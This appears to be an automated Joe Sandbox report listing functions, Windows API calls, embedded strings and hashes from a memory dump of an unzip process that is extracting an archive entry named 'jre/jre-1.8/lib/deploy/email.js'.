Instruction Fuzzy Hash: 22D01775A054208BC2009B18F40023EB7E1AB84310FDA422ED88513398DB39A86786CB

Function 0041D741 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0041D753

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: a5b1fc00ce8640453329da23559c14096b8db2524d1044a9341f0f41a4ad86c4
Instruction ID: d2fac0a3b552ce71b40ae032829462060c1031f3a2cb89f75c93fe2e9490dc7a
Opcode Fuzzy Hash: a5b1fc00ce8640453329da23559c14096b8db2524d1044a9341f0f41a4ad86c4
Instruction Fuzzy Hash: B5A002EFD1046841D981717939471683614545478CFD507A6DD554068BF88D476ED0AB

Function 00420EE0 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12575c04b6340dd2c5cf6be22da55890cc4c9c08b84e6fac2843a25e801da570
Instruction ID: 68223176a5ddb2dec7c041d17bf9e16cfc65c51b3df4d022a9e94442d6da1dd5
Opcode Fuzzy Hash: 12575c04b6340dd2c5cf6be22da55890cc4c9c08b84e6fac2843a25e801da570
Instruction Fuzzy Hash: 4E615C71A187248FD718DF59C48171BFBE2FBC8704F85C92DE9899B346D7B898058B81

Function 00403FF0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f8954469562f9f3db568d24b1eba5978052ad50438de89b2941f8377473ef7
Instruction ID: 8935e828cd820305ccf36af9c43f000ba02fc1bdbb011d62f988eeaedead8619
Opcode Fuzzy Hash: 80f8954469562f9f3db568d24b1eba5978052ad50438de89b2941f8377473ef7
Instruction Fuzzy Hash: BD511571114A11ABC318CF28ECC12637BE2F7D5300B54EABAD9A0DB3A5D7389D42CB54

Function 00417E70 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08f9c070ba3e3a085f3ddee2ee62a0e1766f582b506d12ab453d5f7ace94ae0
Instruction ID: c6812b59b7c1c9cbd74b2048bb1d16a0c5045c651249bca7179d639d4b6606b7
Opcode Fuzzy Hash: e08f9c070ba3e3a085f3ddee2ee62a0e1766f582b506d12ab453d5f7ace94ae0
Instruction Fuzzy Hash: 9621B431A354967ECA16ED2CC8884F377A0EBD73017A81A99DA44C3305C728EA27C798

Function 00418ED0 Relevance: 65.2, APIs: 22, Strings: 15, Instructions: 464COMMON

Download Yara Rule

APIs

mblen.MSVCRT ref: 00418FAB
_isctype.MSVCRT ref: 00418FF4

Strings

warning: skipped "../" path component(s) in %s, xrefs: 00419748
jre/jre-1.8/lib/deploy/email.js, xrefs: 00418F1D, 00418F5A, 00418F75, 00418FC7, 00419281, 0041931C, 00419399, 004193DD, 00419428, 00419583, 004195CA, 004195EC, 00419649, 004196B1, 004196D7, 00419738, 004198CA, 004198DF
mapname: conversion of %s failed, xrefs: 0041932C
warning (%d): could not set file attributes for %s, xrefs: 00419607, 004196F2
mapname: error setting volume label, xrefs: 00419407
creating: %-22s, xrefs: 00419659
jre/jre-1.8/lib/deploy/email.js, xrefs: 00419314, 00419420, 004195E4, 00419641, 004196CF, 00419730
/, xrefs: 0041992C
/, xrefs: 004198D7
%, xrefs: 00419354, 00419464, 0041962F, 00419681, 0041971A, 00419770
:\, xrefs: 004193C0
labelling %s %-22s, xrefs: 0041943C
,%03x, xrefs: 0041951B
:, xrefs: 00419915
/, xrefs: 00419957

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _isctypemblen
String ID: warning (%d): could not set file attributes for %s$ creating: %-22s$%$,%03x$/$/$/$:$:\$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$labelling %s %-22s$mapname: conversion of %s failed$mapname: error setting volume label$warning: skipped "../" path component(s) in %s
API String ID: 1621377779-2965796873
Opcode ID: 97bee76b8ce4c3a63d5a6f1fdb2077fc87290b8852d2e8515086df9cb10b1b10
Instruction ID: 14891d8a123c201f2792ead461182188d41934433bb15689c971870a9657564e
Opcode Fuzzy Hash: 97bee76b8ce4c3a63d5a6f1fdb2077fc87290b8852d2e8515086df9cb10b1b10
Instruction Fuzzy Hash: 4C227AB06097419FD310DF25D4543AABBE1BF94308F44882EE8D55B352DB7C9C8ADB8A

Function 00414110 Relevance: 51.2, APIs: 14, Strings: 20, Instructions: 218stringCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00414182
sprintf.MSVCRT ref: 004141C6
sprintf.MSVCRT ref: 004141FB
sprintf.MSVCRT ref: 0041424C
sprintf.MSVCRT ref: 004142C1
sprintf.MSVCRT ref: 00414304
sprintf.MSVCRT ref: 00414345
strlen.MSVCRT ref: 00414529
sprintf.MSVCRT ref: 0041457E

Strings

this zipfile, out of a total of %u %s. The entire central directory is %lu (%.8lXh) bytes long, and its offset in bytes from, xrefs: 004144DB
-------------------------------, xrefs: 004141EC
Actual offset of end-of-central-dir record: %9ld (%.8lXh) Expected offset of end-of-central-dir record: %9ld (%.8lXh) (based on the length of the central directory and its expected offset), xrefs: 00414221
This zipfile constitutes the sole disk of a single-part archive; its central directory contains %u %s. The central directory is %lu (%.8lXh) bytes long, and its (expected) offset in bytes from the, xrefs: 004142B2
The zipfile comment is truncated., xrefs: 0041442E
There is no zipfile comment., xrefs: 00414336
The zipfile comment is %u bytes long and contains the following text:, xrefs: 00414360
This zipfile constitutes disk %u of a multi-part archive. The central directory starts on disk %u; %u of its entries %s contained within, xrefs: 00414469
entries, xrefs: 004142A2, 004144CB
caution: zipfile comment truncated, xrefs: 0041416E
are, xrefs: 00414452
====, xrefs: 004143F1
End-of-central-directory record:, xrefs: 004141B7
beginning of the zipfile is %lu (%.8lXh)., xrefs: 004142E7
====, xrefs: 0041439C
entry, xrefs: 00414289, 004144C4
the beginning of the zipfile in which it begins is %lu (%.8lXh)., xrefs: 00414510
%, xrefs: 004141A8, 004141DF, 00414214, 00414265, 004142DA, 0041431D, 0041438F, 004143C4, 00414419, 0041449E, 00414503, 00414597
Archive: %s %ld %u, xrefs: 00414538
Archive: %s %ld bytes %u file%s, xrefs: 00414531

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$strlen
String ID: The zipfile comment is truncated.$End-of-central-directory record:$caution: zipfile comment truncated$ Actual offset of end-of-central-dir record: %9ld (%.8lXh) Expected offset of end-of-central-dir record: %9ld (%.8lXh) (based on the length of the central directory and its expected offset)$ The zipfile comment is %u bytes long and contains the following text:$ There is no zipfile comment.$ This zipfile constitutes disk %u of a multi-part archive. The central directory starts on disk %u; %u of its entries %s contained within$ This zipfile constitutes the sole disk of a single-part archive; its central directory contains %u %s. The central directory is %lu (%.8lXh) bytes long, and its (expected) offset in bytes from the$ beginning of the zipfile is %lu (%.8lXh).$ the beginning of the zipfile in which it begins is %lu (%.8lXh).$ this zipfile, out of a total of %u %s. The entire central directory is %lu (%.8lXh) bytes long, and its offset in bytes from$%$-------------------------------$====$====$Archive: %s %ld %u$Archive: %s %ld bytes %u file%s$are$entries$entry
API String ID: 3793847852-1006189261
Opcode ID: f60e9e11f00cd202b4f938cf6c75f52c303e1b8dbcdc091b602730a60916c6e0
Instruction ID: d80b35dd96d874fd93d2b21a4a15f7fe9728527f7ff2bc1b0f240a25ae908bac
Opcode Fuzzy Hash: f60e9e11f00cd202b4f938cf6c75f52c303e1b8dbcdc091b602730a60916c6e0
Instruction Fuzzy Hash: 7DB1A7B060A711ABC3149F16E54426EBBE0FBD4744F90C82EE8D897350DBBD8485DF9A

Function 00403660 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00403683
sprintf.MSVCRT ref: 004036E7
sprintf.MSVCRT ref: 0040371C
sprintf.MSVCRT ref: 00403756
sprintf.MSVCRT ref: 00403793
sprintf.MSVCRT ref: 004037D0
sprintf.MSVCRT ref: 0040380D
sprintf.MSVCRT ref: 0040384A
sprintf.MSVCRT ref: 00403887
sprintf.MSVCRT ref: 004038C4
sprintf.MSVCRT ref: 00403901
sprintf.MSVCRT ref: 0040393E

Strings

[none], xrefs: 00403AF7, 00403B52, 00403BAD, 00403C08
%, xrefs: 0040369C, 00403700, 00403735, 0040376F, 004037AC, 004037E9, 00403826, 00403863, 004038A0, 004038DD, 0040391A, 00403957, 00403994, 004039D1, 00403A0E, 00403A4B, 00403AA0, 00403AD5, 00403B30, 00403B8B, 00403BE6

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: %$[none]
API String ID: 590974362-2079400453
Opcode ID: b3373e45a232b472179981108f076cc05e041a10947a839aa1913e0a6adc300b
Instruction ID: 795f4cfcacbf38203d921db389bd45a581f07c7532a7e63af5001eb8db1d5900
Opcode Fuzzy Hash: b3373e45a232b472179981108f076cc05e041a10947a839aa1913e0a6adc300b
Instruction Fuzzy Hash: 6DD16AB050A751EEC340AF56D14825EBFE0EF90758F81C81EE4C96A261D7BD8488DF9B

Function 004218A0 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 366stringlibraryfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004218F8
GetProcAddress.KERNEL32 ref: 0042190D
strlen.MSVCRT ref: 00421934
realloc.MSVCRT ref: 0042194C
GetVolumeInformationA.KERNEL32 ref: 0042199D
FreeLibrary.KERNEL32 ref: 004219DC
CreateFileA.KERNEL32 ref: 00421A53
DeviceIoControl.KERNEL32 ref: 00421ABC
CloseHandle.KERNEL32 ref: 00421AC9
_errno.MSVCRT ref: 00421AE7
_stricmp.MSVCRT ref: 00421B6D
strncpy.MSVCRT ref: 00421CDA
strncpy.MSVCRT ref: 00421CF8
strncpy.MSVCRT ref: 00421D19

Strings

Z, xrefs: 00421D08
,, xrefs: 00421A85

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strncpy$Library$AddressCloseControlCreateDeviceFileFreeHandleInformationLoadProcVolume_errno_stricmpreallocstrlen
String ID: ,$Z
API String ID: 369425456-3024109530
Opcode ID: ad09d2f8226d6dcdebbfbe79a71e4d8df1c46ddf18d4ad92baabc2bc313873ec
Instruction ID: 34a592bbf1e9af68d9a133ef01ebe1ddb6b290e3f913aaafaef81c4920cc4c5d
Opcode Fuzzy Hash: ad09d2f8226d6dcdebbfbe79a71e4d8df1c46ddf18d4ad92baabc2bc313873ec
Instruction Fuzzy Hash: 22F115B09087919FC320EF29D18065BFBE0BF98344F91892EE8D997351E7789945CF86

Function 00418920 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 272stringfileCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 0041899E
strlen.MSVCRT ref: 004189E8
strcat.MSVCRT ref: 00418A22
FindClose.KERNEL32 ref: 00418A3A
free.MSVCRT ref: 00418A45
free.MSVCRT ref: 00418A6E
FindNextFileA.KERNEL32 ref: 00418A86
strcpy.MSVCRT ref: 00418AAE
strcpy.MSVCRT ref: 00418AE7
strcpy.MSVCRT ref: 00418BC4
strlen.MSVCRT ref: 00418C37

Strings

., xrefs: 00418BC9
%, xrefs: 00418D99
warning: cannot allocate wildcard buffers, xrefs: 00418D71

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strcpy$Findfreestrlen$CloseFileNextstrcat
String ID: %$.$warning: cannot allocate wildcard buffers
API String ID: 1833383691-3937053915
Opcode ID: b88073873ef8da174a9910ba8a3ba5564d5cdf6dde5a16f0e4958c2482d0851f
Instruction ID: 4a6fdd8d478f2890daa3229e1438e185ad4e0504b2af965c467571c8a569a4dc
Opcode Fuzzy Hash: b88073873ef8da174a9910ba8a3ba5564d5cdf6dde5a16f0e4958c2482d0851f
Instruction Fuzzy Hash: 38B12CB4509B059FC710EF25D4812ABBBE0FF84344F95983EE8884B315DB789885DF9A

Function 00416F8C Relevance: 39.3, APIs: 7, Strings: 19, Instructions: 288COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 004170B9
sprintf.MSVCRT ref: 00417112
sprintf.MSVCRT ref: 00417199
sprintf.MSVCRT ref: 0041724B
free.MSVCRT ref: 004172F9
sprintf.MSVCRT ref: 00417330
sprintf.MSVCRT ref: 004173FC

Strings

E, xrefs: 00417002
R, xrefs: 0041700C
%s %s , xrefs: 0041723C
E, xrefs: 00417048
R, xrefs: 0041702F
gfff, xrefs: 00417376
%u.%u, xrefs: 004173D2
D, xrefs: 0041701B
W, xrefs: 00416FF3
D, xrefs: 00416FF8
%8lu, xrefs: 00417317
E, xrefs: 00417025
%, xrefs: 004170D2, 0041712B, 004171B2, 00417264, 00417349
%s %s %8lu , xrefs: 0041708D
D, xrefs: 0041703E
W, xrefs: 00417039
%3d%%, xrefs: 00417383
R, xrefs: 00416FEA
W, xrefs: 00417016

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$free
String ID: %8lu$ %s %s $%$%3d%%$%s %s %8lu $%u.%u$D$D$D$E$E$E$R$R$R$W$W$W$gfff
API String ID: 2409601060-1887074883
Opcode ID: d97ac4ec2c26f6c69c631e5c4c498f76df7e9bc0d7e889f16b9b1814f538fb2a
Instruction ID: fcb25e488bfee7cd2720f940eae15b3780e78b26c12837ee16e8469aeb2d9654
Opcode Fuzzy Hash: d97ac4ec2c26f6c69c631e5c4c498f76df7e9bc0d7e889f16b9b1814f538fb2a
Instruction Fuzzy Hash: CCC19CB150D7908AD3019F29D84439EBFE0AF95344F49C86FE8D487392D7BD8885CB5A

Function 004105BC Relevance: 38.8, APIs: 13, Strings: 9, Instructions: 301COMMON

Download Yara Rule

APIs

_close.MSVCRT ref: 00410664

Strings

error [%s]: start of central directory not found; zipfile corrupt.%s, xrefs: 0041090C
jre/jre-1.8/lib/deploy/email.js, xrefs: 00410D53
, xrefs: 00410811
Archive: %s, xrefs: 00410D6D
%sEmpty zipfile., xrefs: 0041081A
%, xrefs: 004105F2, 004107D5, 00410842, 00410938, 00410BB2, 00410D95
error [%s]: NULL central directory offset (attempting to process anyway), xrefs: 00410B80
warning [%s]: zipfile is empty, xrefs: 00410879
warning [%s]: %ld extra byte%s at beginning or within zipfile (attempting to process anyway), xrefs: 004107A9

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _close
String ID: $%$%sEmpty zipfile.$Archive: %s$error [%s]: NULL central directory offset (attempting to process anyway)$error [%s]: start of central directory not found; zipfile corrupt.%s$jre/jre-1.8/lib/deploy/email.js$warning [%s]: %ld extra byte%s at beginning or within zipfile (attempting to process anyway)$warning [%s]: zipfile is empty
API String ID: 2570677592-2347508103
Opcode ID: abdccac77daecff3f2f4d321fa995d1eaefa45c84f53b814d184b2504d7feab0
Instruction ID: 08381ce8550568dceb36d05d00c5368ee1d3311209aab63e6e9107f1c4569a7b
Opcode Fuzzy Hash: abdccac77daecff3f2f4d321fa995d1eaefa45c84f53b814d184b2504d7feab0
Instruction Fuzzy Hash: C6C14C7060A3018BD320EF25E58026AB7E1FB94744F95D43FE98497351EBB898C58B9E

Function 0041749A Relevance: 36.3, APIs: 10, Strings: 14, Instructions: 269COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 004170B9
sprintf.MSVCRT ref: 00417112
sprintf.MSVCRT ref: 00417199
sprintf.MSVCRT ref: 0041724B
sprintf.MSVCRT ref: 004174F9

Part of subcall function 0040BF70: mblen.MSVCRT ref: 0040BFA6

_strnicmp.MSVCRT ref: 00417586
_strnicmp.MSVCRT ref: 004175AC
_strnicmp.MSVCRT ref: 004175C8
_strnicmp.MSVCRT ref: 004175E4
_strnicmp.MSVCRT ref: 00417600

Strings

%s %s , xrefs: 0041723C
com, xrefs: 0041757B
btm, xrefs: 004175BD
-, xrefs: 00417610
exe, xrefs: 004175A1
jre/jre-1.8/lib/deploy/email.js, xrefs: 0041755C
.r.-... %u.%u, xrefs: 004174C7
cmd, xrefs: 004175D9
x, xrefs: 0041758F
?, xrefs: 0041765E
%, xrefs: 004170D2, 0041712B, 004171B2, 00417264
%s %s %8lu , xrefs: 0041708D
., xrefs: 00417554
bat, xrefs: 004175F5

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _strnicmpsprintf$mblen
String ID: %s %s $%$%s %s %8lu $-$.$.r.-... %u.%u$?$bat$btm$cmd$com$exe$jre/jre-1.8/lib/deploy/email.js$x
API String ID: 34035819-108098936
Opcode ID: d0105c00a05bf2685fa08d1d2e6e856339a2946e30fbe4866ff74161891aa591
Instruction ID: dce6b903962032b6a327a3dd7faa798234df8f49bcefc158e301c25d100f3458
Opcode Fuzzy Hash: d0105c00a05bf2685fa08d1d2e6e856339a2946e30fbe4866ff74161891aa591
Instruction Fuzzy Hash: DAB1CB7050D7409AD3219F28D4443ABBBF0AB95344F44882EE9D48B392DBBDC8C5DB5B

Function 00407A3E Relevance: 35.4, APIs: 13, Strings: 7, Instructions: 378COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00407C01
sprintf.MSVCRT ref: 00407C49
sprintf.MSVCRT ref: 00407AB2

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00407A77, 00407BC7, 00407CF6, 00408068, 00408258, 00408375
hard disk , xrefs: 00407BE5
!, xrefs: 00408170
%, xrefs: 00407ACB, 00407C62, 00407D36, 00407E99, 00407FBC, 00407FF6, 004080A8, 00408180
/, xrefs: 004080E9
jre/jre-1.8/lib/deploy/email.js, xrefs: 00407A7F, 00407BCF, 00407C96, 00407CFE, 00407E74, 00407EB4, 00407EE9, 00407EF5, 00407F11, 00407F1E, 00408070, 004080F1, 0040810C, 00408260, 0040837D
local, xrefs: 00408270, 0040838D

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$Char
String ID: !$%$/$hard disk $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$local
API String ID: 4001210701-2126048688
Opcode ID: 683363751d9ca34c221350108b6035e9bde7be69295354a48990236d5472ea09
Instruction ID: c5bc781e6bdcf92592ce9a5e4e09ca07b47f8c8018024cd3083fc974a6dfa5e7
Opcode Fuzzy Hash: 683363751d9ca34c221350108b6035e9bde7be69295354a48990236d5472ea09
Instruction Fuzzy Hash: 91F15D70A0D7119BD310AF15D54422ABBE0EB94344F90C83FE9846B391DBBCA885DB9F

Function 0041C2A0 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 253synchronizationstringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0041C2DC
lstrcmpiA.KERNEL32 ref: 0041C2FD
LeaveCriticalSection.KERNEL32 ref: 0041C31E
GetVolumeInformationA.KERNEL32 ref: 0041C370
GetDriveTypeA.KERNEL32 ref: 0041C3A7
EnterCriticalSection.KERNEL32 ref: 0041C3C7
LeaveCriticalSection.KERNEL32 ref: 0041C3E6
lstrlenA.KERNEL32 ref: 0041C4CA
CreateMutexA.KERNEL32 ref: 0041C5B7
InterlockedExchange.KERNEL32 ref: 0041C5D2
InterlockedExchange.KERNEL32 ref: 0041C5EB
CloseHandle.KERNEL32 ref: 0041C5FA
WaitForSingleObject.KERNEL32 ref: 0041C60D
ReleaseMutex.KERNEL32 ref: 0041C618

Strings

\, xrefs: 0041C522
\, xrefs: 0041C590

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveMutex$CloseCreateDriveHandleInformationObjectReleaseSingleTypeVolumeWaitlstrcmpilstrlen
String ID: \$\
API String ID: 2609806232-164819647
Opcode ID: 547304257d03c89bea78b8942ad31d797793299fcc6c74a7f866995fc86df013
Instruction ID: 2a4c202de7ae5d32773fa92db75c3f60b10b4c596cf688ff04f8ac63915f4813
Opcode Fuzzy Hash: 547304257d03c89bea78b8942ad31d797793299fcc6c74a7f866995fc86df013
Instruction Fuzzy Hash: 3EA1C3B05483909BD710AF35D8843ABBBE1AB85304F41997EE9D547341D7BCD888CB8B

Function 00402AB0 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 281COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00402B42
_isatty.MSVCRT ref: 00402C6A
sprintf.MSVCRT ref: 00402C94
sprintf.MSVCRT ref: 0040341D
sprintf.MSVCRT ref: 0040344E

Strings

, xrefs: 004035DB
, xrefs: 004035BB
, xrefs: 004035D3
, xrefs: 004035EB
, xrefs: 004035E3
%, xrefs: 00402B5B, 00402CAD, 00403432, 00403463, 004034BC, 0040352C, 0040356D, 004035A6, 00403617
, xrefs: 004035C3

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
